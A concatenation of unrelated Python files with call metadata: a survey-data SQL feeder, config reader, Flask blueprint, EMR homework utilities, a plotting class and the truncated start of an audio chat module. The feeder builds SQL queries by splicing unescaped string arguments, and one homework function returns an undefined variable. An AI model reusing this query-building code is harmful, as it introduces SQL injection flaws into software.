df = df.pivot(index='time_stamp', columns='fh_ticker', values='value')
df.index = pd.to_datetime(df.index)
df = df.dropna(how='all')
df = df.sort_index()
return df
class FocusFeeder(object):
def __init__(self, db_connect):
"""
Feeder construction
:param db_connect: sql connection engine from sqlalchemy
"""
self.conn = db_connect.connection
def fetch(self, index='ipca', frequency='yearly', prediction_scope=None,
dt_ini=None, dt_end=None):
"""
Grabs data from the data base and pivots the results into a dataframe. To assure consistency The function can
only take one index at a time and one frequency at a time. Only'prediction_scope' can be a list.
If no prediction scope is passed, all available prediction scopes are returned.
:param index: String containing the name of the index.
:param frequency: String. 'yearly', 'monthly' or 'quarterly' (availability depends on the index)
:param prediction_scope: string, float or list. Years that the forecasts are for.
:param dt_ini: string. Initial date for the series
:param dt_end: string. End date for the series
:return: pandas DataFrame with the pivoted data.
"""
# Error Checking
self._basic_assertions(index, frequency, prediction_scope)
# Handle formats
index, frequency, prediction_scope, dt_ini, dt_end, pivot \
= self._map_inputs(index, frequency, prediction_scope, dt_ini, dt_end)
# build sql query
sql_query = self._build_sql_query(index, frequency, prediction_scope, dt_ini, dt_end)
# get data
df = pd.read_sql(sql=sql_query, con=self.conn)
df = df.drop_duplicates()
# pivoting
df = df.pivot(index='date', columns=pivot, values='value')
df.index = pd.to_datetime(df.index)
return df
def years_ahead(self, index='IPCA', years=1, dt_ini=None, dt_end=None):
"""
The metric atribute is set to 'mean' by default because further projections change smoothly
"""
# Error checking
self._basic_assertions_years_ahead(index, years)
# Handle formats
index, dt_ini, dt_end = self._map_inputs_years_ahead(index, dt_ini, dt_end)
# grabs the index for all available years for each date
df = self.fetch(index=index, frequency='yearly', prediction_scope=None,
dt_ini=dt_ini, dt_end=dt_end)
# creates the new dataframe
df_weighted = pd.DataFrame(index=df.index)
df_weighted[index + ' ' + str(years) + ' year ahead'] = np.nan
# days until year end
df_weighted['D2YE'] = ((df_weighted.index + pd.offsets.YearEnd()) -
pd.to_datetime(df_weighted.index.tolist())).days
for ind in df_weighted.index:
if ind.day == 31 and ind.month == 12:
df_weighted.loc[ind, 'D2YE'] = 0
# loops on each date
for date in df_weighted.index:
df_weighted.loc[date, index + ' ' + str(years) + ' year ahead'] = \
(df.loc[date, str(date.year + years - 1)] * df_weighted.loc[date, 'D2YE'] +
df.loc[date, str(date.year + years)] * (365 - df_weighted.loc[date, 'D2YE'])) / 365
df = df_weighted[[index + ' ' + str(years) + ' year ahead']].interpolate()
df.index = pd.to_datetime(df.index)
return df
@staticmethod
def _basic_assertions(index, frequency, prediction_scope):
"""Check basic assertions"""
assert type(index) is str, 'index must be a string'
assert type(frequency) is str, 'frequency must be a string'
@staticmethod
def _map_inputs(index, frequency, prediction_scope, dt_ini, dt_end):
"""Handle formats of the inputs"""
# index
if type(index) is str:
index = index.lower()
elif type(index) is list:
index = [x.lower() for x in index]
# frequency
frequency = frequency.lower()
# prediction_scope
if type(prediction_scope) is str:
prediction_scope = prediction_scope.lower()
elif type(prediction_scope) is list:
prediction_scope = [str(x).lower() for x in prediction_scope]
elif prediction_scope is None:
prediction_scope = None
else:
prediction_scope = str(prediction_scope).lower()
# dates
if dt_ini is None:
dt_ini = '1900-01-01'
if dt_end is None:
dt_end = datetime.now().strftime('%Y-%m-%d')
# pivot variable (while we have no metrics, its always the prediction scope)
pivot = 'prediction_scope'
return index, frequency, prediction_scope, dt_ini, dt_end, pivot
@staticmethod
def _build_sql_query(index, frequency, prediction_scope, dt_ini, dt_end):
sql_query = 'SELECT DATE, VALUE, PREDICTION_SCOPE FROM "focus_survey" WHERE '
# index (must not be None)
if type(index) is str:
sql_query = sql_query + "lower(INDEX) IN ('" + index + "')"
elif type(index) is list:
sql_query = sql_query + "lower(INDEX) IN ('" + "', '".join(index) + "')"
# frequency
if type(frequency) is str:
sql_query = sql_query + " AND lower(FREQUENCY) IN ('" + frequency + "')"
elif type(frequency) is list:
sql_query = sql_query + " AND lower(FREQUENCY) IN ('" + "', '".join(frequency) + "')"
# prediction scope
if type(prediction_scope) is str:
sql_query = sql_query + " AND lower(PREDICTION_SCOPE) IN ('" + prediction_scope + "')"
elif type(prediction_scope) is list:
sql_query = sql_query + " AND lower(PREDICTION_SCOPE) IN ('" + "', '".join(prediction_scope) + "')"
sql_query = sql_query + " AND DATE BETWEEN '" + dt_ini + "' AND '" + dt_end + "'"
sql_query = sql_query + ' ORDER BY DATE;'
return sql_query
@staticmethod
def _basic_assertions_years_ahead(index, years):
"""Check basic assertions"""
assert type(index) is str, 'index must be a string'
assert (type(years) is int) and (years <= 4), 'number of years must be an intger between 1 and 4'
@staticmethod
def _map_inputs_years_ahead(index, dt_ini, dt_end):
"""Handles the format of the inputs of the years_ahead method"""
index = index.lower()
# dates
if dt_ini is None:
dt_ini = '1900-01-01'
if dt_end is None:
dt_end = datetime.now().strftime('%Y-%m-%d')
return index, dt_ini, dt_end
| [((43, 13, 43, 54), 'pandas.read_sql', 'pd.read_sql', (), '', True, 'import pandas as pd\n'), ((49, 19, 49, 43), 'pandas.to_datetime', 'pd.to_datetime', ({(49, 34, 49, 42): 'df.index'}, {}), '(df.index)', True, 'import pandas as pd\n'), ((62, 13, 62, 54), 'pandas.read_sql', 'pd.read_sql', (), '', True, 'import pandas as pd\n'), ((91, 13, 91, 55), 'pandas.read_sql', 'pd.read_sql', (), '', True, 'import pandas as pd\n'), ((119, 13, 119, 54), 'pandas.read_sql', 'pd.read_sql', (), '', True, 'import pandas as pd\n'), ((122, 19, 122, 43), 'pandas.to_datetime', 'pd.to_datetime', ({(122, 34, 122, 42): 'df.index'}, {}), '(df.index)', True, 'import pandas as pd\n'), ((164, 13, 164, 54), 'pandas.read_sql', 'pd.read_sql', (), '', True, 'import pandas as pd\n'), ((169, 19, 169, 43), 'pandas.to_datetime', 'pd.to_datetime', ({(169, 34, 169, 42): 'df.index'}, {}), '(df.index)', True, 'import pandas as pd\n'), ((189, 22, 189, 50), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((207, 19, 207, 43), 'pandas.to_datetime', 'pd.to_datetime', ({(207, 34, 207, 42): 'df.index'}, {}), '(df.index)', True, 'import pandas as pd\n'), ((193, 52, 193, 72), 'pandas.offsets.YearEnd', 'pd.offsets.YearEnd', ({}, {}), '()', True, 'import pandas as pd\n'), ((247, 21, 247, 35), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n'), ((302, 21, 302, 35), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n')] |
mklew/quickstart-data-lake-qubole | assets/utils/config.py | bb9b4a559815fc293b0fa06aa7e536fe14ced6dd | from configparser import ConfigParser
CONFIG_INT_KEYS = {
'hadoop_max_nodes_count',
'hadoop_ebs_volumes_count',
'hadoop_ebs_volume_size',
'spark_max_nodes_count',
'spark_ebs_volumes_count',
'spark_ebs_volume_size'
}
def read_config(config_path):
parser = ConfigParser()
parser.read(config_path)
config = {}
for section in parser.sections():
for (config_key, config_value) in parser.items(section):
config[config_key] = int(config_value) if config_key in CONFIG_INT_KEYS else config_value
return config
| [((14, 13, 14, 27), 'configparser.ConfigParser', 'ConfigParser', ({}, {}), '()', False, 'from configparser import ConfigParser\n')] |
lvyaoo/api-demo | app/blueprints/admin_api/__init__.py | f45c05c154385510572b5200b74dcbbfdb7e234c | from flask import Blueprint
from .hooks import admin_auth
from ...api_utils import *
bp_admin_api = Blueprint('bp_admin_api', __name__)
bp_admin_api.register_error_handler(APIError, handle_api_error)
bp_admin_api.register_error_handler(500, handle_500_error)
bp_admin_api.register_error_handler(400, handle_400_error)
bp_admin_api.register_error_handler(401, handle_401_error)
bp_admin_api.register_error_handler(403, handle_403_error)
bp_admin_api.register_error_handler(404, handle_404_error)
bp_admin_api.before_request(before_api_request)
bp_admin_api.before_request(admin_auth)
from . import v_admin
| [((7, 15, 7, 50), 'flask.Blueprint', 'Blueprint', ({(7, 25, 7, 39): '"""bp_admin_api"""', (7, 41, 7, 49): '__name__'}, {}), "('bp_admin_api', __name__)", False, 'from flask import Blueprint\n')] |
nihaagarwalla/nd320-c1-emr-data-starter | project/starter_code/student_utils.py | 6ce6bb65e89b38f1c2119a739b892ad2504adf7d | import pandas as pd
import numpy as np
import os
import tensorflow as tf
import functools
####### STUDENTS FILL THIS OUT ######
#Question 3
def reduce_dimension_ndc(df, ndc_df):
'''
df: pandas dataframe, input dataset
ndc_df: pandas dataframe, drug code dataset used for mapping in generic names
return:
df: pandas dataframe, output dataframe with joined generic drug name
'''
ndc_df["Non-proprietary Name"]= ndc_df["Non-proprietary Name"].str.replace("Hcl", "Hydrochloride")
ndc_df["Non-proprietary Name"]= ndc_df["Non-proprietary Name"].str.replace(" And ", "-")
ndc_df["Non-proprietary Name"]= (ndc_df["Non-proprietary Name"].str.strip()).str.upper()
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Tablet, Film Coated", "TABLET")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Tablet, Coated", "TABLET")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Tablet, Film Coated, Extended Release", "Tablet Extended Release")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Tablet, Extended Release", "Tablet Extended Release")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("For Suspension, Extended Release", "For Suspension Extended Release")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Powder, Metered", "Powder Metered")
# ndc_df["Dosage Form"]= (ndc_df["Dosage Form"].str.strip()).str.upper()
# ndc_df["generic_drug_name"]= ndc_df["Non-proprietary Name"]+"_"+ndc_df["Dosage Form"]
ndc_df["generic_drug_name"]= ndc_df["Non-proprietary Name"]
df_reduce_dimension = pd.merge(df, ndc_df, on=['ndc_code'], how='inner')
df_reduce_dimension['LABEL'] = 0
reduce_dim_df= df_reduce_dimension.drop(columns=['Proprietary Name', 'Non-proprietary Name', 'Dosage Form', 'Route Name', 'Company Name', 'Product Type'])
return reduce_dim_df
#Question 4
def select_first_encounter(df):
'''
df: pandas dataframe, dataframe with all encounters
return:
- first_encounter_df: pandas dataframe, dataframe with only the first encounter for a given patient
'''
first_encounter_df = df.sort_values('encounter_id').groupby('patient_nbr').first()
first_encounter_df = first_encounter_df.reset_index()
return first_encounter_df
#Question 6
def patient_dataset_splitter(df, key='patient_nbr'):
'''
df: pandas dataframe, input dataset that will be split
patient_key: string, column that is the patient id
return:
- train: pandas dataframe,
- validation: pandas dataframe,
- test: pandas dataframe,
'''
df = df.iloc[np.random.permutation(len(df))]
unique_values = df[key].unique()
total_values = len(unique_values)
train_size = round(total_values * (1 - 0.4 ))
train = df[df[key].isin(unique_values[:train_size])].reset_index(drop=True)
left_size = len(unique_values[train_size:])
validation_size = round(left_size*0.5)
validation = df[df[key].isin(unique_values[train_size:train_size+validation_size])].reset_index(drop=True)
test = df[df[key].isin(unique_values[validation_size+train_size:])].reset_index(drop=True)
return train, validation, test
#Question 7
def create_tf_categorical_feature_cols(categorical_col_list,
vocab_dir='./diabetes_vocab/'):
'''
categorical_col_list: list, categorical field list that will be transformed with TF feature column
vocab_dir: string, the path where the vocabulary text files are located
return:
output_tf_list: list of TF feature columns
'''
output_tf_list = []
for c in categorical_col_list:
vocab_file_path = os.path.join(vocab_dir, c + "_vocab.txt")
'''
Which TF function allows you to read from a text file and create a categorical feature
You can use a pattern like this below...
tf_categorical_feature_column = tf.feature_column.......
'''
tf_categorical_feature_column = tf.feature_column.categorical_column_with_vocabulary_file(
key=c, vocabulary_file = vocab_file_path, num_oov_buckets=1)
one_hot_origin_feature = tf.feature_column.indicator_column(tf_categorical_feature_column)
output_tf_list.append(one_hot_origin_feature)
return output_tf_list
#Question 8
def normalize_numeric_with_zscore(col, mean, std):
'''
This function can be used in conjunction with the tf feature column for normalization
'''
return (col - mean)/std
def create_tf_numeric_feature(col, MEAN, STD, default_value=0):
'''
col: string, input numerical column name
MEAN: the mean for the column in the training data
STD: the standard deviation for the column in the training data
default_value: the value that will be used for imputing the field
return:
tf_numeric_feature: tf feature column representation of the input field
'''
normalizer = functools.partial(normalize_numeric_with_zscore, mean=MEAN, std=STD)
tf_numeric_feature= tf.feature_column.numeric_column(
key=col, default_value = default_value, normalizer_fn=normalizer, dtype=tf.float64)
return tf_numeric_feature
#Question 9
def get_mean_std_from_preds(diabetes_yhat):
'''
diabetes_yhat: TF Probability prediction object
'''
m = diabetes_yhat.mean()
s = diabetes_yhat.stddev()
return m, s
# Question 10
def get_student_binary_prediction(df, col):
'''
df: pandas dataframe prediction output dataframe
col: str, probability mean prediction field
return:
student_binary_prediction: pandas dataframe converting input to flattened numpy array and binary labels
def convert_to_binary(df, pred_field, actual_field):
df['score'] = df[pred_field].apply(lambda x: 1 if x>=25 else 0 )
df['label_value'] = df[actual_field].apply(lambda x: 1 if x>=25 else 0)
return df
binary_df = convert_to_binary(model_output_df, 'pred', 'actual_value')
binary_df.head()
'''
return student_binary_prediction
| [((30, 26, 30, 76), 'pandas.merge', 'pd.merge', (), '', True, 'import pandas as pd\n'), ((118, 17, 118, 85), 'functools.partial', 'functools.partial', (), '', False, 'import functools\n'), ((119, 24, 120, 87), 'tensorflow.feature_column.numeric_column', 'tf.feature_column.numeric_column', (), '', True, 'import tensorflow as tf\n'), ((86, 26, 86, 68), 'os.path.join', 'os.path.join', ({(86, 39, 86, 48): 'vocab_dir', (86, 51, 86, 67): "c + '_vocab.txt'"}, {}), "(vocab_dir, c + '_vocab.txt')", False, 'import os\n'), ((93, 40, 94, 72), 'tensorflow.feature_column.categorical_column_with_vocabulary_file', 'tf.feature_column.categorical_column_with_vocabulary_file', (), '', True, 'import tensorflow as tf\n'), ((95, 33, 95, 98), 'tensorflow.feature_column.indicator_column', 'tf.feature_column.indicator_column', ({(95, 68, 95, 97): 'tf_categorical_feature_column'}, {}), '(tf_categorical_feature_column)', True, 'import tensorflow as tf\n')] |
peendebak/core_tools | core_tools/utility/plotting/plot_1D.py | 2e43edf0bbc1d7ceb7042559db499535e8f6a076 | import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
import copy
from core_tools.utility.plotting.plot_settings import plot_layout, graph_settings_1D, _1D_raw_plot_data
from core_tools.utility.plotting.plot_general import _data_plotter
class plotter_1D(_data_plotter):
def __init__(self, plt_layout = plot_layout(), graph_setings = graph_settings_1D()):
self.plot_layout = plt_layout
self.local_data = np.empty([plt_layout.n_plots_y, plt_layout.n_plots_x], dtype = _1D_plot_single)
for i in range(self.local_data.size):
self.local_data.flat[i] = _1D_plot_single(graph_setings)
class _1D_plot_single:
def __init__(self, graph_settings):
self.settings = copy.copy(graph_settings) #default settings
self.data = []
self.x_lim = None
self.y_lim = None
def set_labels(self, xlabel, ylabel):
self.settings.xlabel = xlabel
self.settings.ylabel = ylabel
def set_range(self, x_range=None, y_range=None):
if x_range is not None:
self.x_lim = x_range
if y_range is not None:
self.y_lim = y_range
def add_data(self, x, y, xerr = None, yerr = None, label = None, settings = None, w=None, c=None, alpha=None):
if settings == None:
settings = copy.copy(self.settings)
else:
settings = copy.copy(settings)
if label is not None:
settings.label = label
if w is not None:
if 'l' not in w:
settings.linestyle = ''
if 'p' in w:
settings.marker = 'o'
if c is not None:
settings.color = c
if alpha is not None:
settings.alpha = alpha
self.data += [_1D_raw_plot_data(x,y, xerr, yerr, settings)]
def _render(self, ax, layout_settings, index, scaler = 1, figure=None):
ax.locator_params(axis='x', nbins=layout_settings.xbins)
ax.locator_params(axis='y', nbins=layout_settings.ybins)
ax.xaxis.set_minor_locator(mpl.ticker.AutoMinorLocator())
ax.yaxis.set_minor_locator(mpl.ticker.AutoMinorLocator())
ax.tick_params(direction='in', which='both', top=True, right=True)
if self.settings.xlog == True:
ax.set_xscale('log')
if self.settings.ylog == True:
ax.set_yscale('log')
if self.x_lim is not None:
ax.set_xlim(*self.x_lim)
if self.y_lim is not None:
ax.set_ylim(*self.y_lim)
labels = False
for i in range(len(self.data)):
data = self.data[i]
if data.x_error == None and data.y_error == None:
ax.plot(data.x_data, data.y_data, **data.settings.plot_settings_to_dict(i, scaler))
else:
pass
# ax.errorbar(a, c, yerr = b/10,ecolor='g',linewidth=1.2,elinewidth=0.7)
if data.settings.label is not None:
labels = True
if self.settings.xlabel is not None:
if layout_settings.share_x == False:
ax.set_xlabel(self.settings.xlabel)
elif index[0] == layout_settings.n_plots_x-1 :
ax.set_xlabel(self.settings.xlabel)
if self.settings.ylabel is not None:
if layout_settings.share_y == False:
ax.set_ylabel(self.settings.ylabel)
elif index[1] == 0 :
ax.set_ylabel(self.settings.ylabel)
if labels == True:
ax.legend()
# TODO add log scale support !!!
if __name__ == '__main__':
from colors import MATERIAL_COLOR, Red
# global settings
g = graph_settings_1D()
g.color = Red[::-1]
g.linewidth = 1
a = plotter_1D(graph_setings=g)
a[0].set_labels('x_label', 'y_label')
a[0].add_data(np.linspace(0,50,200), np.sin(np.linspace(10,50,200)), w = 'p', alpha = 1, c=Red[5])
a[0].add_data(np.linspace(0,50,200), np.sin(np.linspace(10,50,200)), w = 'l', alpha = 0.3, c=Red[5])
# a.plot()
a.save('test1D_single.svg')
a = plotter_1D(plot_layout(n_plots_x = 1,n_plots_y = 2))
a[0].set_labels('x_label', 'y_label')
a[0].add_data(np.linspace(10,50,50), np.random.random([50]))
a[0,1].set_labels('x_label', 'y_label')
a[0,1].add_data(np.linspace(10,50,50), np.random.random([50]))
a.save('test1D_12.svg')
# a.plot()
a = plotter_1D(plot_layout(n_plots_x = 2,n_plots_y = 2, share_x=True, share_y=True))
a[0].set_labels('x_label', 'y_label')
a[0].add_data(np.linspace(10,50,50), np.random.random([50]), label='test 1')
a[0,1].set_labels('x_label', 'y_label')
a[0,1].add_data(np.linspace(10,50,50), np.random.random([50]), label='test 2')
a[0,1].add_data(np.linspace(10,50,50), np.random.random([50]))
a[1,0].set_labels('x_label', 'y_label')
a[1,0].add_data(np.linspace(10,50,50), np.random.random([50]))
a[1,1].set_labels('x_label', 'y_label')
a[1,1].add_data(np.linspace(10,50,50), np.sin(np.linspace(10,50,50)))
a.save('test1D_22.svg')
# a.plot()
a = plotter_1D(plot_layout((300, 70), n_plots_x = 6,n_plots_y = 1, share_x=False, share_y=True))
a[0].set_labels('time (ns)', 'Spin up probably (%)')
a[0].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
a[1].set_labels('time (ns)', 'Spin up probably (%)')
a[1].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
a[2].set_labels('time (ns)', 'Spin up probably (%)')
a[2].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
a[3].set_labels('time (ns)', 'Spin up probably (%)')
a[3].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
a[4].set_labels('time (ns)', 'Spin up probably (%)')
a[4].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
a[5].set_labels('time (ns)', 'Spin up probably (%)')
a[5].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
print(a)
a.save('test1D_61.svg')
a.plot() | [((107, 5, 107, 24), 'core_tools.utility.plotting.plot_settings.graph_settings_1D', 'graph_settings_1D', ({}, {}), '()', False, 'from core_tools.utility.plotting.plot_settings import plot_layout, graph_settings_1D, _1D_raw_plot_data\n'), ((10, 33, 10, 46), 'core_tools.utility.plotting.plot_settings.plot_layout', 'plot_layout', ({}, {}), '()', False, 'from core_tools.utility.plotting.plot_settings import plot_layout, graph_settings_1D, _1D_raw_plot_data\n'), ((10, 64, 10, 83), 'core_tools.utility.plotting.plot_settings.graph_settings_1D', 'graph_settings_1D', ({}, {}), '()', False, 'from core_tools.utility.plotting.plot_settings import plot_layout, graph_settings_1D, _1D_raw_plot_data\n'), ((12, 20, 12, 99), 'numpy.empty', 'np.empty', (), '', True, 'import numpy as np\n'), ((19, 18, 19, 43), 'copy.copy', 'copy.copy', ({(19, 28, 19, 42): 'graph_settings'}, {}), '(graph_settings)', False, 'import copy\n'), ((113, 15, 113, 36), 'numpy.linspace', 'np.linspace', ({(113, 27, 113, 28): '(0)', (113, 29, 113, 31): '(50)', (113, 32, 113, 35): '(200)'}, {}), '(0, 50, 200)', True, 'import numpy as np\n'), ((114, 15, 114, 36), 'numpy.linspace', 'np.linspace', ({(114, 27, 114, 28): '(0)', (114, 29, 114, 31): '(50)', (114, 32, 114, 35): '(200)'}, {}), '(0, 50, 200)', True, 'import numpy as np\n'), ((119, 16, 119, 56), 'core_tools.utility.plotting.plot_settings.plot_layout', 'plot_layout', (), '', False, 'from core_tools.utility.plotting.plot_settings import plot_layout, graph_settings_1D, _1D_raw_plot_data\n'), ((122, 15, 122, 36), 'numpy.linspace', 'np.linspace', ({(122, 27, 122, 29): '(10)', (122, 30, 122, 32): '(50)', (122, 33, 122, 35): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((122, 38, 122, 60), 'numpy.random.random', 'np.random.random', ({(122, 55, 122, 59): '[50]'}, {}), '([50])', True, 'import numpy as np\n'), ((125, 17, 125, 38), 'numpy.linspace', 'np.linspace', ({(125, 29, 125, 31): '(10)', (125, 32, 125, 34): '(50)', (125, 35, 125, 37): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((125, 40, 125, 62), 'numpy.random.random', 'np.random.random', ({(125, 57, 125, 61): '[50]'}, {}), '([50])', True, 'import numpy as np\n'), ((131, 16, 131, 84), 'core_tools.utility.plotting.plot_settings.plot_layout', 'plot_layout', (), '', False, 'from core_tools.utility.plotting.plot_settings import plot_layout, graph_settings_1D, _1D_raw_plot_data\n'), ((134, 15, 134, 36), 'numpy.linspace', 'np.linspace', ({(134, 27, 134, 29): '(10)', (134, 30, 134, 32): '(50)', (134, 33, 134, 35): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((134, 38, 134, 60), 'numpy.random.random', 'np.random.random', ({(134, 55, 134, 59): '[50]'}, {}), '([50])', True, 'import numpy as np\n'), ((137, 17, 137, 38), 'numpy.linspace', 'np.linspace', ({(137, 29, 137, 31): '(10)', (137, 32, 137, 34): '(50)', (137, 35, 137, 37): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((137, 40, 137, 62), 'numpy.random.random', 'np.random.random', ({(137, 57, 137, 61): '[50]'}, {}), '([50])', True, 'import numpy as np\n'), ((138, 17, 138, 38), 'numpy.linspace', 'np.linspace', ({(138, 29, 138, 31): '(10)', (138, 32, 138, 34): '(50)', (138, 35, 138, 37): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((138, 40, 138, 62), 'numpy.random.random', 'np.random.random', ({(138, 57, 138, 61): '[50]'}, {}), '([50])', True, 'import numpy as np\n'), ((141, 17, 141, 38), 'numpy.linspace', 'np.linspace', ({(141, 29, 141, 31): '(10)', (141, 32, 141, 34): '(50)', (141, 35, 141, 37): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((141, 40, 141, 62), 'numpy.random.random', 'np.random.random', ({(141, 57, 141, 61): '[50]'}, {}), '([50])', True, 'import numpy as np\n'), ((144, 17, 144, 38), 'numpy.linspace', 'np.linspace', ({(144, 29, 144, 31): '(10)', (144, 32, 144, 34): '(50)', (144, 35, 144, 37): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((149, 16, 149, 96), 'core_tools.utility.plotting.plot_settings.plot_layout', 'plot_layout', (), '', False, 'from core_tools.utility.plotting.plot_settings import plot_layout, graph_settings_1D, _1D_raw_plot_data\n'), ((152, 15, 152, 36), 'numpy.linspace', 'np.linspace', ({(152, 27, 152, 28): '(0)', (152, 29, 152, 32): '(500)', (152, 33, 152, 35): '(50)'}, {}), '(0, 500, 50)', True, 'import numpy as np\n'), ((155, 15, 155, 36), 'numpy.linspace', 'np.linspace', ({(155, 27, 155, 28): '(0)', (155, 29, 155, 32): '(500)', (155, 33, 155, 35): '(50)'}, {}), '(0, 500, 50)', True, 'import numpy as np\n'), ((158, 15, 158, 36), 'numpy.linspace', 'np.linspace', ({(158, 27, 158, 28): '(0)', (158, 29, 158, 32): '(500)', (158, 33, 158, 35): '(50)'}, {}), '(0, 500, 50)', True, 'import numpy as np\n'), ((161, 15, 161, 36), 'numpy.linspace', 'np.linspace', ({(161, 27, 161, 28): '(0)', (161, 29, 161, 32): '(500)', (161, 33, 161, 35): '(50)'}, {}), '(0, 500, 50)', True, 'import numpy as np\n'), ((164, 15, 164, 36), 'numpy.linspace', 'np.linspace', ({(164, 27, 164, 28): '(0)', (164, 29, 164, 32): '(500)', (164, 33, 164, 35): '(50)'}, {}), '(0, 500, 50)', True, 'import numpy as np\n'), ((167, 15, 167, 36), 'numpy.linspace', 'np.linspace', ({(167, 27, 167, 28): '(0)', (167, 29, 167, 32): '(500)', (167, 33, 167, 35): '(50)'}, {}), '(0, 500, 50)', True, 'import numpy as np\n'), ((37, 14, 37, 38), 'copy.copy', 'copy.copy', ({(37, 24, 37, 37): 'self.settings'}, {}), '(self.settings)', False, 'import copy\n'), ((39, 14, 39, 33), 'copy.copy', 'copy.copy', ({(39, 24, 39, 32): 'settings'}, {}), '(settings)', False, 'import copy\n'), ((52, 16, 52, 60), 'core_tools.utility.plotting.plot_settings._1D_raw_plot_data', '_1D_raw_plot_data', ({(52, 34, 52, 35): 'x', (52, 36, 52, 37): 'y', (52, 39, 52, 43): 'xerr', (52, 45, 52, 49): 'yerr', (52, 51, 52, 59): 'settings'}, {}), '(x, y, xerr, yerr, settings)', False, 'from core_tools.utility.plotting.plot_settings import plot_layout, graph_settings_1D, _1D_raw_plot_data\n'), ((59, 29, 59, 58), 'matplotlib.ticker.AutoMinorLocator', 'mpl.ticker.AutoMinorLocator', ({}, {}), '()', True, 'import matplotlib as mpl\n'), ((60, 29, 60, 58), 'matplotlib.ticker.AutoMinorLocator', 'mpl.ticker.AutoMinorLocator', ({}, {}), '()', True, 'import matplotlib as mpl\n'), ((113, 45, 113, 67), 'numpy.linspace', 'np.linspace', ({(113, 57, 113, 59): '(10)', (113, 60, 113, 62): '(50)', (113, 63, 113, 66): '(200)'}, {}), '(10, 50, 200)', True, 'import numpy as np\n'), ((114, 45, 114, 67), 'numpy.linspace', 'np.linspace', ({(114, 57, 114, 59): '(10)', (114, 60, 114, 62): '(50)', (114, 63, 114, 66): '(200)'}, {}), '(10, 50, 200)', True, 'import numpy as np\n'), ((144, 47, 144, 68), 'numpy.linspace', 'np.linspace', ({(144, 59, 144, 61): '(10)', (144, 62, 144, 64): '(50)', (144, 65, 144, 67): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((152, 45, 152, 66), 'numpy.linspace', 'np.linspace', ({(152, 57, 152, 59): '(10)', (152, 60, 152, 62): '(50)', (152, 63, 152, 65): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((155, 45, 155, 66), 'numpy.linspace', 'np.linspace', ({(155, 57, 155, 59): '(10)', (155, 60, 155, 62): '(50)', (155, 63, 155, 65): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((158, 45, 158, 66), 'numpy.linspace', 'np.linspace', ({(158, 57, 158, 59): '(10)', (158, 60, 158, 62): '(50)', (158, 63, 158, 65): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((161, 45, 161, 66), 'numpy.linspace', 'np.linspace', ({(161, 57, 161, 59): '(10)', (161, 60, 161, 62): '(50)', (161, 63, 161, 65): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((164, 45, 164, 66), 'numpy.linspace', 'np.linspace', ({(164, 57, 164, 59): '(10)', (164, 60, 164, 62): '(50)', (164, 63, 164, 65): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n'), ((167, 45, 167, 66), 'numpy.linspace', 'np.linspace', ({(167, 57, 167, 59): '(10)', (167, 60, 167, 62): '(50)', (167, 63, 167, 65): '(50)'}, {}), '(10, 50, 50)', True, 'import numpy as np\n')] |
Forec/lan-ichat | v0.3/achat.py | f2ae85ef6a8f2b30126be787e52785971c926d8c | # last edit date: 2016/11/2
# author: Forec
# LICENSE
# Copyright (c) 2015-2017, Forec <[email protected]>
# Permission to use, copy, modify, and/or distribute this code for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
from socket import *
import threading
import pyaudio
import wave
import sys
import zlib
import struct
import pickle
import time
import numpy as np
CHUNK = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 2
RATE = 44100
RECORD_SECONDS = 0.5
class Audio_Server(threading.Thread):
def __init__(self, remoteIP, remotePort, remoteVersion) :
threading.Thread.__init__(self)
self.setDaemon(True)
self.ADDR = (remoteIP, remotePort)
if remoteVersion == 4:
self.sock = socket(AF_INET ,SOCK_STREAM)
else:
self.sock = socket(AF_INET6 ,SOCK_STREAM)
self.p = pyaudio.PyAudio()
self.stream = None
def __del__(self):
if self.sock is not None:
self.sock.close()
if self.stream is not None:
try:
self.stream.stop_stream()
self.stream.close()
except:
